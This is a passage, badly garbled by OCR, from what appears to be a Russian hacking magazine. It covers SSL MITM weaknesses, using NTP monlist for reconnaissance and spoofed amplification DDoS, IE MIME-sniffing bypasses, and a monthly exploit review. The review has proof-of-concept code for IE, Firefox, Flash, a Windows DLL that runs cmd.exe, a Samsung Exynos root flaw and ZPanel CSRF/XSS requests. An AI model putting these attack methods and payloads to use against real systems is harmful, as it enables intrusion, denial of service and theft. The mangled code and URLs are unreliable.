самоподписанный сертификат! Во-вторых, другая проблема в том, 
что некоторые проверяют валидность сертификата, да вот только 
не проверяют (или некорректно проверяют) имя сервера, к которо- 
му происходит подключение, и имя сервера в сертификате. То есть 
мы можем подсунуть валидный, подписанный крутым СА сертифи- 
кат, но от другого сервера. Угар! Это связано с тем, что очень часто 
551-библиотеки перекладывают это дело на уровень приложения, 
а кодеры пропускают этот момент. И получается вроде 551, а вроде 
и защиты от МІТМ'а нет :). 

Так вот, возвращаясь к предыдущему вопросу. В нескольких 
очень распространенных фреймворках для создания веб-сервисов, 
а именно Ахіз, Ахіз2, ХРіге, были найдены косяки с 551. Если точ- 
нее, то последний — сертификат проверяется, но не сравнивается 
СМ и имя сервера. И до кучи амазоновские клиенты для управ- 
ления облаками также имели проблемы с 551. Таким образом, 
до середины 2011 года можно было достаточно просто натворить 
таких дел в с Амазоном :). Сейчас официально уязвимости в ос- 
новном поправлены, но когда еще до конечных пользователей все 
в полной мере дойдет... 
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Хакерские секреты простых вещей 



СОБРАТЬ ИНФОРМАЦИЮ, ИСПОЛЬЗУЯ ПРОТОКОЛ НТР 



ЗАДАЧА 



ІРЕШЕНИЕІ 

МТР (Меіѵѵогк Тіте Ргоіосоі) — сетевой ІІОР-протокол (порт 123) 
для синхронизации внутренних часов компьютера с использо- 
ванием сетей с переменной латентностью. И все мы знаем его 
как простейший протокол для получения времени. Послал ІІОР- 
пакет и получаешь время. Хотя тут стоит отметить, что с точки 
зрения внутренней организации он непрост, особенно если до- 
бавить всякие штуки, связанные с безопасностью, типа открытой 
криптографии... 

Протокол сам по себе старый, хотя постепенно обновляется 
(последняя версия МТР — 4). И сточки зрения многих, он, ка- 
залось бы, не представляет особого интереса при взломе... Вот 
здесь и хотелось бы подискутировать. Ведь как это ни стран- 
но — есть о чем. 

Итак, скажу сразу, что кроме синхронизации времени прото- 
кол поддерживает еще приличный пучок возможностей! Хочешь 
попробовать? Воспользуйся командой пірсіс в *піх-системе, 
подключись к какому-нибудь МТР-серверу и увидишь в хелпе 
приличный список. Но если говорить об интересностях для наше- 
го дела, то МТР-сервер — это одно из простейших мест для сбора 
информации о версии ОС и о версии МТР. Зачем нам версия МТР? 
Несмотря на его «простоту», в нем был найден ряд переполняшек, 
которыми потенциально можно воспользоваться (см. рис. 1). 

Но, как ни странно, это не все. МТР-серверы по умолчанию 
поддерживают команду топІізС с помощью которой можно полу- 
чать информацию о том, кто пользуется этим сервером! Если точ- 
нее, то сервер на эту команду «выплевывает» внешние ІР-адреса 
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Рис. 2. Повод для 00о5. Один запрос — много-много ответов 

клиентов и реег'ов (если по-простому, то клиентов, которые 
для кого-то тоже являются серверами), а кроме этого, в опреде- 
ленных случаях еще и внутренние адреса. А все это уже интерес- 
но. Сохраняется сервером примерно 600 последних записей. 

Чтобы получить информацию о МТР-сервере, проще всего вос- 
пользоваться Мтар'ом: 

1. Собираем информациюосервере: 

птар -50 -р123 -5Ѵ --5СгірТ=п'Ьр-іп-Ро ѵіс‘Сіт__пТ:р_5егѵег 

2. Собираем информацию о«клиентах»МТР-сервера: 

птар -50 -р123 -5Ѵ --5Сгір-С=п1р-топ1І5І 
ѵіс'Ьіт_п1:р_5егѵег 
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Рис. 1. Получение информации от НТР-сервера 



Таким образом, мы можем использовать МТР-сервер как ос- 
нову для сбора ІР-адресов хостов сети. Но это еще не все. Если 
посмотреть на МТР с более глобальной точки зрения, то возмож- 
ности наши сильно возрастают. Но здесь важно знать следу- 
ющее. Во-первых, в инете у нас полным-полно всевозможных 
МТР-серверов, реег'ов. Список их доступен на пір. ого . Во-вторых, 
большинство крупных вендоров (ПО или девайсов) имеют свои 
пулы МТР-серверов. Например, в винде используется пул «Ііте. 
ѵуіпсІоѵУБ.сот». В-третьих, у большинства девайсов и ОС МТР- 
клиенты (и серверы — для серверов) включены по умолчанию. 

И что это нам даст? 

А то, что, например, подключившись к МТР-серверу какого-то 
вендора и систематически отправляя команду ппопіібі, мы сможем 
получить очень большой список ІР-адресов его девайсов со всего 
мира. А после — целенаправленно атаковать эти девайсы :). 

Компания Бепзерозі опубликовала тулзу ( доо.дІ/ТгѵѵсІІ . кото- 
рая собирает информацию о клиентах и серверах и генерит отчет 
в формате МаІІедо. Получается красиво. 

Вторым вектором является еще одна находка. Некогда небе- 
зызвестный НО Мооге рассказал о возможности с помощью МТР- 
серверов организовать гигантский 00о5 против какой-то цели, 
за счет возможности сгенерить до 30 Гбит/с трафика. Подробностя- 
ми он не поделился, но те же спецы из Вепзерозі предположили, 
что за основу Мооге использовал именно команду глопіізі. Почему 
топіізі? Из-за того, что одна команда (один УОР-запрос) порожда- 
ет большое множество ответных пакетов с данными (см. рис. 2). 

Таким образом, предположительный вектор представляет 
собой следующее: собираем список МТР-серверов, поддерживаю- 
щих команду топіізі (таких очень много в Сети), а далее постоян- 
но посылаем на них эту команду (так, чтобы сам сервер не задо- 
сить), но подменив ІР-адрес отправителя (то есть наш) на адрес 
нашей жертвы. Так как в качестве основы используется протокол 
УОР, то у нас с этим нет проблем. Получается, что безобидный 
МТР в некоторых случаях становится мощным оружием. 
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ВЗЛ0М/ЕА5УНАСК 



ОБОЙТИ ОПРЕДЕЛЕНИЯ МІМЕ-ТИПА В ІЕ 



ЗАДАЧА 



^ЕЩЕНІД 

Еще один пост про Х55 и другие атаки для обхода 50Р, но, думаю, 
полезный, так как обнажит нам, «откуда ноги растут» :). 

Итак, есть такой браузер — ІЕ. И у него очень интересный, 
нестандартный механизм определения типа файлов и реакция 
на него. Говоря проще: если ты укажешь браузеру НТМІ'ную 
страничку (типа ехатрІе.огдДезІ.ЫтІ) или что-то еще, типа 5ѴѴР 
(ехатрІе.огдЛезІ.Бѵѵ!), — он тебе ее отпарсит как НТМІ, отобразит 
плагином или предложит скачать. Мы можем воспользоваться 
данными особенностями для проведения каких-то атак (типа ХБ5). 
Давай приведу пару примеров. Вот предположим, мы нашли воз- 
можность инъекции кода в ^50N-ответ, но который возвращается 
с заголовком «Сопіепі-Туре: аррІісаІіоп/х-]аѵа5СгірІ». В данном 
случае Х55-атаку нам вроде как не провести, так как ІЕ посмотрит 
на заголовок и отобразит страничку, не парся, пэйн-текстом так 
сказать (или предложит скачать). Или другой вариант: мы можем 
закачать на сервер файл с произвольным контентом (НТМІ'ка 
с ХББ'кой или 5\^Р’ка, проксирующая запросы хакера), но возвра- 
щается он нам без расширения. Тогда ІЕ в любом случае будет ска- 
чивать этот файл — и атаки на этом особой не построишь. Так вот, 
зная повадки ІЕ, мы можем ими воспользоваться и сделать так, 
чтобы ІЕ воспринимал контент как необходимый нам тип данных. 

Здесь стоит отметить, что другие браузеры также имеют не- 
сколько различные механизмы определения типов, но в основном 
все-таки они опираются на поле заголовка ответа от сервера 
«Сопіепі-Туре». Типа что там указано — тем и обрабатываем. 

Официально у ІЕ процесс нигде не описан. Но зато есть отличная 
преза, автор — Йосуке Хасегава (Ѵозике Назедаѵѵа): доо.дІ/]еОдѴѴ І. 

А в ней прекрасная схема (см. рисунок). Подробно можно все понять 
из нее. Сам важный для нас факт — на определение типа файла в ІЕ 
очень сильно влияет расширение файла. На эти данные ІЕ пола- 
гается, если заголовок «Соп^еп^Туре» ему неизвестен (не зареги- 
стрирован), а известных не очень много (Ыт*, изображения). 

То есть в общем случае если мы можем внедрить данные в файл 
на сервере, то для его превращения в правильный и нужный нам 
тип нам надо «подменить» его расширение. И что для нас самое хо- 
рошее — сделать это иногда очень нетрудно. Надо всего лишь до- 
бавить в конец ІІРІ’а необходимое нам расширение, но так, чтобы 
приложение (веб-сервер) продолжало считать, что обращение про- 




исходит к нужному нам ІІРІ’у. Например, 35Р поддерживает точку 
с запятой для разделения параметров, но для ІЕ точка с запятой 
может быть в пути к файлу, а потому мы можем передать необраба- 
тываемый параметр, который воспримется ІЕ как расширение. 

Ы-Ьр : //ѵісЬіт . сош/ѵиіп . ^ 5р; апу_б1е_пате . апу_ех-1:еп5іоп 

Кроме этого, в РНР и .МЕТ мы можем обмануть браузер за счет 
того, что эти языки поддерживают передачу раіИ-іп!о в качестве 
параметра после пути до скрипта, но отделенного от скрипта сле- 
шем «/». То есть следующее также сработает: 

ІтЬ'Ьр : //ѵісЬіт. сош/ѵиіп. рЬр/апу_б1е_пате.*-* 
апу_ех-Сеп5іоп?диегу=5-Сгіпе 

ІтС'^р : //ѵіс^іш. сош/ѵиіп . азрх /апу_б1е_паше . «-• 
апу_ех1:еп$іоп?диегу=5Тгіп§[ 

Кроме этого, если расширение сді, ехе или пустое, то ІЕ может 
брать тип расширения из диегу зігіпд. Таким образом, имеем сле- 
дующие варианты, когда ІЕ скушает подставное расширение: 

ИТТр : //ѵісііш . сош/Тоо . с§і ?рагаш=аЬс&апу_б1е_паше . 
апу_ех1еп$іоп 

ІтСІір : // ѵісТіш . сош/Тоо . ехе ?рагаш=аЬс&апу_Я1е_паше . 4-* 

апу_ехТ:еп$іоп 

Ы1р://ѵісТіш.сош/-Роо?рагаш=аЬс&апу_б1е_паше.4-' 
апу_ех1еп5Іоп 

Ы:-Ср://ѵіс'1іш.сош/Тоо/?рагаш=аЬс&апу_Я1е_паше.^ 

апу_ех-Сеп$іоп 

А в иных расширениях — не скушает из диегу зігіпд'а: 

Ы-Ср://ѵіс‘Ыш.сош/Тоо.рЬр?рагаш=аЬс&апу_б1е_паше.*-« 

апу_ехТеп5іоп 

Таким образом, мы можем в большинстве случаев обмануть ІЕ. 
Возьмем пример. Есть веб-сервер, на который мы можем заливать 
файлы. Но сервер ссылочку дает до него в виде «Ьир://ѵісІіт.сот/ 
2222 ». Предположим, что залили мы БѴѴР’ку, которая будет прокси- 
ровать наши запросы через клиента-жертву, и создали страничку 
на своем сервере, подгружающую БѴѴР’ку с помощью плеера (типа 
«<оЬ]ес1 .. 5гс="Ьир://ѵісІіт.сот/2222">»). Но ІЕ жертвы хоть и за- 
пустит плагин, но не запустит контент, заблудившись где-то в про- 
цессе определения типов :). Зато с использованием « 5 гс=Нир:// 
ѵісІіт.сот/2222,ааа.5ѵѵГ» все заработает прекрасно! 

С точки зрения минусов и трудностей мы утыкаемся в два про- 
блемных момента. Во-первых, это заголовок Сопіепі-Оізрозіііоп, 
который указывает браузеру, что файл необходимо скачать. Далее, 
заголовок «Х-Сопіепі-Туре-Орііопз: по5пі(Ь>, указывающий ІЕ 
основываться только на Сопіепі-Туре или скачивать файл в ином 
случае. Последний проблемный момент может быть с Сопіепі-Туре, 
начинающимся с ітаде/что-то, который укажет ІЕ обрабатывать 
данные только как изображение. Ну вот, а так — очень угарно. 
Поподробнее, но в контексте эксплуатации Х55 в ЗБОМ'е можно 
почитать здесь: доо.дІ/ІУ^иѵ. доо.дІ/5І12д . 

Вот и все. Надеюсь, что было интересно :). Кстати, если инте- 
ресно что-нибудь поресерчить или видишь себя пентестером — на- 
пиши мне на аогггсіодйоппаіі.сот . И успешных познаний нового! □□ 
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Получаем гооі-права на Батзипд'ах, 0-сІау 
в ѴѴІпсіоѵѵз, несколько эксплойтов для 
Іпіегпеі Ехріогег, «роняем» последний 
РігеЬх, изучаем уязвимость в АсІоЬе РІазИ 
РІауег, а также множественные уязвимости 
в іРапеІ в сегодняшнем обзоре эксплойтов. 







эксплоитов 
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И Переполнение стека в МісгозоН Іпіегпеі 
Ехріогег 9.x 



СѴ55Ѵ2 Щ 



Дата релиза: 20 декабря 2012 года 
Автор: ^еап РазсаІ Регеіга 
СѴЕ:М/А 

Начнем наш обзор с переполнения стека (обрати внимание, 
что именно переполнения стека, а не переполнения буфера в сте- 
ке— это две разные вещи) в Іпіегпеі Ехр1огег9.х. Открыв специ- 
альным образом созданную страницу, можно обрушить браузер. 

в результате анализа падений браузера выяснилось, что уязви- 
мость кроется в динамической библиотеке тзЫтІ.сЛІ. При попыт- 
ке распарсить определенную последовательность незакрытых те- 
гов в ІЕ происходит переполнение стека и последующее падение. 
Неперевариваемая цепочка тегов выглядитследующим образом: 

<-ЬаЫе> 

</-Ррг хт1п5=''1"> 

<‘ЬсІ><с1а1:е'1:іте><со1§гоир> 

<ІСІ><СІСІ><СОІ> 

</1аЫе> 

<оЬзес^><ИгхЬа5е> 



А вот место, на котором происходит падение: 



7629СР36 

7629СР39 


8В40 Е4 
24 04 


тоѵ есх^сімогсі ріг 5з:[еЬр-1с] 
алсі аІИ 


7629СРЗВ 


0Р86С0 


ГПОѴ 2 Х еах^аі 


7629СРЗЕ 


Р708 


пе§ еах 


7629СР40 


1ВС0 


зЬЬ еах^еах 


7629СР42 


25 0А010180 


апсі еах^ 8001010а 


7629СР47 


8901 


шоѵ сімогсі ріг сіз: [есх]^еах 


7629СР49 

7629СР4С 


8845 Е8 
50 


иіаѵ еах,сІмогсІ р^г 5з:[еЬр-18] 
ризЬ еах 


7629СР40 


53 


ризЬ еЬх 


7629СР4Е 


8975 08 


июѵ СІМОГСІ р-Сг зз: [еЬр-28],езі 


7629СР51 


РР70 5С 


ризЬ СІЫОГСІ ріг сІ5:[еах+5с] 



По адресу 0х7629СР51 происходит геасіассеззѵіоіаііоп, после 
которого браузер отправляется на покой. Самое интересное, 
что при проверке РоС эксплойта в ІЕЮ с включенным режимом со- 
вместимости с ІЕ7/8/9 браузер каждый раз падал. Невосприимчив 
кпереполнениюстекаосталсятольколишьнативный режим ІЕЮ, 
то есть его собственный. 

ІпІегпеіЕхрІогег9.х. 



зоіитіон 



Ксчастью, выяснилось, чтоданнуюуязвимостьпроэксплуати- 
ровать не получится, поэтому максимум, что сможет сделать 
злоумышленник, — обрушить браузер. Чтобы этого не произошло, 
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рекомендуется установить ІЕЮ. А еще лучше вообще от него от- 
казаться:). 



Меілогу соггирііоп в АсІоЬе РІавН РІауег 
11.5.502.135 






Отказ в обслуживании в Рігеіох 18.0 



СѴ55Ѵ2 



Дата релиза: 18 декабря 2012 года 

Автор: ІітЬО 

СѴЕ:М/А 



М/АІ 



М/А 



СѴ55Ѵ2 М/АІ 



М/А 

М:П?Э 

Дата релиза: 17 декабря 2012 года 

Автор: сооІкаѵеЬ 

СѴЕ:М/А 

Баг во флеш-плеере от АбоЬе, который может привести к удален- 
ному выполнению произвольного кода.Уязвимостьпроявляется 
при открытии специально сформированного РІѴ-файла. 



Уязвимость, приводящая к отказу в обслуживании, найдена в еще 
одном популярном браузере — МогіІІа Ріге(ох. Стоитлишьоткрыть 
страницу, содержащую специальный ^аѵа5сгір^-код, как огнен- 
ный лис начинаетбольшими кусками поглощатьсвободную опера- 
тивную память, пока не съест всю. 

Сам эксплойтпредставляет собой буквально несколько строк 
кода: 

<ІіТт1> 

<Ьеас1> 

<сепТег> 

<Ы>Ріге-Рох Сга5Іі РоС</И1> 

<5СгірТ Туре=’ЧехТ/заѵа5СгірТ"> 

. /Рип сі іоп с га 5 Ь ( ) { 

•Рог (і = 0; і < 100; 1-»-+) { 

БиЬзесТ = сІоситепІ.ЬосІу.іппегНТМІ; 
сіоситепт . мгіТе( зиЬ ^ес1) ; 

} 

} 

</5СГІрТ> 

<Ьос1у> 

<-Рогт> 

<іприТ Туре="ЬиТ1:оп" ѵа1ие=”Сга5И ІТ" опс1іск="сга5Іі()’‘ /> 

</-Рогт> 

< / Ьосіу X / с епТе г X / НеасІ X / ЬТтІ > 

Итак, есть валидный документе ООМ-структурой и неболь- 
шим ^аѵа5сгір^'ом. Атакже кнопка «СгазИ І1», по клику на которую 
как раз и вызывается «добрая» функция сгазЫ). Что она делает? 
Для начала получает весь контент<ЬосІу>: 

зиЬзесТ = сІоситепТ.ЬосІу.іппегНТМІ 

а после тут же его дописывает в корневой узел «сіоситепі»: 

(1оситепТ.мгіТе(5иЬзесТ) 

И все это происходит в цикле, повторяясь сто раз. Автор экс- 
плойта проверял его на Ыпих, но надо сказать, что при проверке 
на ѴѴіп8х64 ситуация оказаласьтой же самой — браузер мгновен- 
но скушал всю доступную память и упал, предложив отправить 
отчет. 

Ріге^ох 17.0.1 и 18.0. 



Смысл уязвимости заключается, втом, что, подсунув флеш-плееру 
специальный РСѴ-файл, можно записать данные в неразмечен- 
ную область памяти. Готовый РоС можно скачать по ссылке: ЬіЦу/ 
21т6дЬ . Открыв его, получаем следующее: 

900. с80): Ассезз ѵіоІа'Ьіоп - сосіе С0000005 
( ! ! ! зесопсі сЬапсе ! ! ! ) 

еах=00000000 еЬх=02-Ре-Рс138 есх=00000000 ес1х=-Р-Р-Р-Р'Р-Р-Р-Р 
езі=03230000 еаі=02-Ре-Рс13с 

еір=01953095 езр=02-Ре-Рс2с еЬр=02-Ре-РсІ48 іор1=0 
пѵ ир еі р1 2 Г па ре пс 

С5=001Ь 55=0023 сі5=0023 65=0023 -Р5=003Ь §5=0000 еЛ=00200246 
РІа5И32_11_5_502_135 ! О1іипге§І5-Сег5егѵег+0х22сІ8Ь-Р : 
01953095 0-РЬ-Рі456 тоѵ5х есІх,могсІ р-^г [е5І+ес1х*2] 4-< 
сІ5:0023:0322-Р^^е=???? 

ЕхсерТіоп Раи11:іп§ АсІсІге55: 0х322-р-р-Ре 

БесопсІ СЬапсе Ехсер'Сіоп Туре: 5ТАТи5_АССЕ55_ѴІОІАТІОЫ 

(0ХС0000005) 

РаиІТіпд ІП5ТгисТіоп:01953095 пюѵ5Х есІх,могсІ рТг 
[е5І+есІх*2] 

Ва5іс Віоск: 

01953095 тоѵ5х есІх,могсІ рТг [е5І+есІх*2] 

ТаіпТесІ ІприТ 0регапсІ5: есіх, е5І 
01953099 іпс еах 

0195309а стр сімогсі рТг [еЬр-0сЬ],1 
0195309е тоѵ сімогсі рТг [еЬр+есх*4-110Ь],есІх 

ТаіпТесІ ІприТ 0регапсІ5: есіх 
019530а5 тоѵ сімогсі рТг [еЬр+8],еах 

019530а8 з’пе Ла5Ь32_11_5_502_135!сІ11ипге8І5І:ег5егѵег+«-' 
0x22(1887 (0195305СІ) 

ЕхсерТіоп На5Н (Мазог/Міпог) : 0х1е0-РбаЗ-Р.0х1е0-Р6а1с 
БТаск Тгасе: 

Р1а5Ь32_11_5_502_135 ! О1іипге§і5Тег5егѵег+0х22сІ8Ь-Р 
Р1а5И32_11_5_502_135 ! О1іипге§і5І:ег5егѵег+0х22с4е7 
Р1а5Ь32_11_5_502_135 ! О1іипге§і5Тег5егѵег+0х22с8е7 
Р1а5Ь32_11_5_502_135 ! О1іипге§і5І:ег5егѵег+0х22сеса 
Р1а5Ь32_11_5_502_135+0х19-Р324 
РІа5Ь32_11_5_502_135+0х19-Р36а 
Р1а5Ь32_11_5_502_135+0х19-РсІ15 

Р1а5Ь32_11_5_502_135 ! О1іипге§і5І:ег5егѵег+0х48-р-РЗ 
Р1а5Ь32_11_5_502_135 ! О1іипге§І5І:ег5егѵег+0х49072 
Іп5ТгисТіоп Ас1сІге55: 0x0000000001953095 



^оіитіон 



Исправления на данный моментне существует. 



АсІоЬе РІазН РІауег 11.5.502.135. 
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50ШТІ0Н 



Исправления на данный момент не существует. 

0 Отслеживание координат курсора мыши 
через ІЕ 



СѴ55Ѵ2 ^ 



М/А 

Дата релиза: 11 декабря 2012 года 

Автор: Nіск^оИп5оп 

СѴЕ:М/А 

Интереснейшая фича была найдена в этом месяце в браузере 
ІЕ6-10. Заключается она втом, что Іпіегпеі Ехріогегпозволяет 
отслеживать местоположение курсора мыши на экране, даже если 
его окно находится в неактивном или минимизированном состоя- 
нии. Это позволяетузнать, какие клавиши пользователь нажимал 
на виртуальной клавиатуре, какие пин-коды набирал. Таким обра- 
зом, даже если пользователь ІЕ следитза безопасностью своего 
ПК и вовремя устанавливает все обновления, то он все равно 
может статьжертвой злоумышленника, просто разместившего 
специальный скриптпод видом рекламы на ресурсе, который по- 
сещает пользователь. 

Проблема кроется в событийной модели Іпіегпеі Ехріогег'а, 
которая заполняет глобальный объект Еѵепі атрибутами, от- 
носящимися к событиям мыши, даже когда этого не следует 
делать. В совокупности с возможностью вручную генерировать 
событие при помощи метода ІігеЕѵепН) это дает возможность 
^аѵа5сгір1'у на любой странице (или любому іігате внутри любой 
страницы) опрашивать положение курсора в любой момент, 
даже когда вкладка, содержащая страницу, или окно браузера 
не в фокусе или минимизированы. Плюс к этому метод ІігеЕѵепіО 
предоставляет состояние клавиш <СігІ>,<АІІ> и <5Ы^1>. Исходя 
из всего вышесказанного, можно заключить, что объект Еѵепі 
будет предоставлять следующие свойства: аІіКеу, аКІе^І, сІіепіХ, 
сІіепіѴ, сІгІКеу, сігііей, оІІзеіХ, о^^зеіѴ, зсгеепХ, зсгеепѴ, зЫЙКеу, 
зЫНІеІІ, хиу. 

Давай посмотрим на РоС-эксплойт: 

<!ООСТУРЕ Ы:т1> 

<Ь-Ьт1> 

<ИеасІ> 

<те1:а сІіаг5е'Ь="и-Ь-Е-8" /> 

<Ш:1е>Ехр1оі1: Оето</^і1:1е> 

<5сгір^ гуре=’Чеx■^/^аѵа5сгір1"> 




міпгіом.а^1:асИЕѵеп1("оп1оа<1'', ^^ипс.1:Іоп() { 
ѵаг сіеііес'^ог = сІоситепІі.^е'ЬЕІетеп-СВуІсІС'сІеІесІог"); 
сІе'1:ес'Ьог.а1:'^асЬЕѵеп'1:("оппюи5етоѵе"л •Рипсііоп (е) { 
сІе^ес'Ьог.іппегНТМІ = е.зсгеепХ + ", " + 
е.зсгеепѴ; 

}); 

зеІІп-ЬегѵаІС-РипсІіоп () { 
сіе^есіог . бгеЕѵеп'Ь ( "оптоизепюѵе " ) ; 

}, 100 ); 

}); 

</5СГІр-С> 

</ЬеасІ> 

<ЬосІу> 

<сІіѵ іс1="сІе^ес-1:ог"></сІіѵ> 

</ЬосІу> 

</Ы:т1> 

Итак, что делаетэтоткод?Он отслеживает каждые 100 мс пере- 
движение мыши и выводите сііѵ с ісІ="сіеІесІог" текущие коорди- 
наты курсора. Кроме этого, на сайте автора доступно Ыѵе Пето — 

іеоаіаіеак.вр ісі ег.і о/ае то . 

Чем интересен данный баг? Да тем, что сводит на нетавтори- 
зациюпри помощи виртуальной клавиатуры, таксильнолюбимую 
многими банковскими сайтами. 

Іпіегпеі ЕхрІогег6-10. 

Исправления на данный момент не существует. 



Ш Запуск произвольного кода в \ѴіпсІо^5 
при смене иконки 



ІСѴ55Ѵ2 ^ 



М/А 

озшз 

Дата релиза: 21 декабря 2012 года 
Автор: Павел Марков 
СѴЕ:М/А 

Недавно на портале зесигіІуІаЬ.ги появилась статья «Как я нашел 
О-бау в ОС ѴѴіпсіоѵѵз», в которой описан дан ошибки, приводящей 
к исполнению произвольного кода при смене иконки для 011- 
файлов. 

Автор статьи задался поиском возможности запуска произ- 
вольного кода при работе пользователей с 011-файлами. Была 
создана следующая, довольно простая либа: 

ВООШІЫАРІ011Маіп( _Iп_НIN5ТАNСЕЬіп51:^^^, 
_Іп_ОМОКО-РсІмКеа50п, 

_Іп_ІРѴ0І01рѵКезегѵесІ ) { 

МіпЕхес("спк1.ехе",5И_5НОЫ); 
геТигп Тгие; 

} 

При смене иконки для данной библиотеки выполняется заши- 
тая в нее команда стсі.ехе. То есть пользователь, сам того не зная, 
выполняетцелевой код насвоей системе. Полная статья итехни- 
ческие подробности доступны по ссылке: Ьіиу/Ѵек6ѵ5 . 



2РапеІ собственной персоной \А/і ПСІОѴѴЗ ХР/7. 
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ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 




АРІ-ионитор при смене иконки. ѴѴіп О-Оау 



ШШШ 

ѴѴіпсіоѵѵБ 8 не подвержена данной уязвимости. 



КооІ ехрІоИ на мобильных процессорах 
Ехупоз 



СѴ55Ѵ2 



Дата релиза: 15 декабря 2012 года 

Авторы: аІерЬгаіп 

СѴЕ:М/А 

Программисты Батзипд при разработке одного из драйверов до- 
пустили серьезную оплошность, которая на устройствах с процес- 
сорами Ехупоз (4210 и 4412) позволяет (потенциально) выполнить 
команды от пользователя гооі. 

\шьы 

Из-за халатности (или некомпетентности) одного из разработчи- 
ков драйверов вЗатзипдтакиеустройства, какЗатзипд баіаху 
51(,5атзипд6а1ахуМо1е 2, МЕІ21І МХ, идругиеустройстванабазе 
мобильных процессоров Ехупоз (4210 и 441 2), использующие 
исходники ядра отЗатзипд, подвержены выполнению команд 
от пользователя гооі в приложениях, не имеющих на это прав. Та- 
кая возможность открылась благодаря тому, что устройство /сіеѵ/ 
ехупоз-тет имеет права Р/ѴѴдля всех, в результате чего можно 
получить доступ ко всей физической памяти устройства! Как след- 
ствие, любое приложение, например из маркета, может выполнить 
неуязвимых платформах команды от рута, при этом пользователь 
даже ничего не заметит. 

Нуатеперь немного технических подробностей. Разрешенные 
операции на девайсе (Ііпих/сігіѵегз/сЬаг/тет.с): 

зТаІіс сопзТ зіігисі: Я1е_орегаТ:іоп5 ехупо5_тет_-Рор5 = { 
,ореп = ехупо5_теш_ореп, 

.геіеазе = ехупо5_тет_ге1еазел 

.ипІоскесІ^іосТІ = ехупо5_тет_іосТ:1, 

.ттар = ехупо5_тет_ттар, 

} 

и дефолтные права (также из Ііпих/сІгіѵегз/сИаг/тет.с) 

#И"сІе-Р С0NРIС_ЕXVN05_МЕМ 

[14] = {"ехупоз-тет" ^ 5_ІКи5К ( 5_ІЫи5К ) 5_ІКеКР ) ^ 
5_ІіліекР 1 5_ІРОТН I 5_І^0ТН, &ехупоз_глет_[орз}, 

#епсІі-Р 

ІосІІ-запрос к/(іеѵ/ехупоз-глет регтіі на очищение/запись кеша 
уровней и 12 выставит некешируемое значение и задастадрес 
вфизической памяти для использования ттар. А что с ттар? 

Только одно ограничение по доступу к Іоѵ/тет (Ііпих/сігіѵегз/ 
сЬаг/ехупоз-тет.с) 

/* ТООО: сиггеп-Цу Іомтет із опіу аѵаіаЫе */ 

ІТ ((рИуз_1о_ѵіг1:(з1:аг1:) < (ѵоісі ♦)РАСЕ_ОЕЕ5ЕТ) |) 
(рЬуз_‘Ьо_ѵіг1:(з1:аг'Ь) >= Иі§б_тетогу)) { 
рг_егг("[%з] іпѵаіісі расІсІг(0х%08х)\п", Типе , 



УСТРОЙСТВА НА БАЗЕ 
ПРОЦЕССОРОВ ЕХУМ05 
(4210 И 4412) ПОДВЕРЖЕНЫ 
ВЫПОЛНЕНИЮ КОМАНД 
ОТ ПОЛЬЗОВАТЕЛЯ КООТ 



зТагТ); 

геТигп -ЕINVА^^ 



Теперьвзглянем, что пишутв Ооситепіаііоп/агт/тетогу.іхі. 
БІагТ ЕпсІ Узе 



РАСЕ_ОРР5ЕТ Ьі§И_тетогу-1 



Кегпеі сІігесТ-тарресІ КАМ 
ге§іоп.ТНіз тарз ТЬе рІаТТогтз 
КАМ, апсі Турісаііу тарз а11 
рІаТТогт КАМ іп а 1:1 
геІаІіопзЬір. 



Другими словами, этоограничиваетустройствудоступтолько 
к своей памяти, включая код ядра. 

Автор находки уже выпустил фикс. А другой исследователь 
зарелизил АРК'шку, которая получает рута :). Все подробности 
оданнойуязвимости можно почитатьздесь: ЬіІ.Іу/ІІЬЗОдК . 



Платформы на процессорах Ехупоз (4210 и 4412), использующие 
кодотБатзипд. 



шшмі 

Доступно неофициальное исправление. 



т 



Множественные уязвимости в 2РапеІ 



ІѴ55Ѵ2 



(АѴ:М/АС:1/Аи:5/С:Р/І:Р/А:Р) 

|:1ИІ4Д 

Исследовательбезопасностиподзагадочным НИКОМ рез]] пред- 
ставляет на суд зрителей несколько уязвимостей в 2РапеІ — па- 
нели управления веб-хостингом с открытым исходным кодом. 
Вспискезначатся: подделка межсайтовых запросов, межсай- 
товый скриптинг, внедрение 501-запросов и неавторизованный 
сброс пароля. 



\ шь \ и 

Недостаточная защита от С$ЯР (СѴЕ-2012-5683). Все важные 
функции в панели лишены защиты от подделки межсайтовых 
запросов. Следующий пример показывает, что для создания РТР- 
пользователя под именем ^ип нетребуется аутентификационный 
токен: 

ІтСІр : //192 . 168 . 1 . 100/ ?тосІи1е=-Р1р_тапа§етеп-С&ас1:іоп=«-^ 
СгеаНеРТР 
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Обзор эксплоитов 



Р05Т /2рапе1/?тосІи1е=-Рі:р_тапа§етеп1:&ас1:іоп=Сгеа1:еРТР ^ 
НТТР/1.1 

Н05^: 192.168.1.100 

Ке-Регег : ИНр : //192 . 168 . 1 . 100/ ?тосІи1е=-р-Ьр_тапа8етеп1: 
Соокіе : РНР5Е55I^=4^с^0^о^ссIр5■РЗе65 ^іиѵ5и^сI2 
СопІеітЬ-Туре: арр1іса1:іоп/х-ммм--Рогт-иг1епсосІесІ 
СопІеггЪ-Іепб-ЬЬ: 107 

іпРТРи$егпате=-Рип&іпРа55могс1=-Рип&іпАссе$5=КМ&іпАи'ЬоНоте=^ 

2&іп0е5-Ьіпа1:іоп=&іп0е5'Ьіпа-Ьіоп=&іп5иЬті-1:= 

Активная Х55ІСѴЕ-2012-5684). Уязвимым является параметр 
іпРиІІпате. Полное имя пользователя никак не фильтруется 
и отображается в первозданном виде на странице панели. Таким 
образом, злоумышленник может внедрить вредоносный скрипт: 

ЬТТр : //192 . 168 . 1 . 100/2рапе1/ ?тосІи1е=ту_ассоипТ&асТіоп=^ 
УрсІаТеАссоипТБеТТіпез 

Р05Т /?тосІи1е=ту_ассоип1:&ас1іоп=ирсІаТеАссоипТ5еТ1:іп8$ 
НТТР/1.1 

Н05І:: 192,168.1.100 
КеТегег: 

ИТТр : //192 . 168 . 1 . 100/2рапе1/ ?тосІи1е=ту_ассоипТ&асТіоп=4-і 
ІІрсІа1:еАссоипТ5еТТіпе5 

Соокіе: РНР5Е55I^=4гс^0^о^ссIр5•РЗе65^іиѵ5и^сI2 
СопТепТ-Туре: аррИсаТіоп/х-ѵлім-Тогш-игІепсосІесІ 
СопТепТ-ІепеТІі: 143 

іпРи11пате=Ас1тіп%ЗС5СгірТ%ЗЕа1ег1:%28/Тип/%29%ЗС%2Р5СГІр1:-і 

%ЗЕ&іпЕтаі1=асІтіп% 

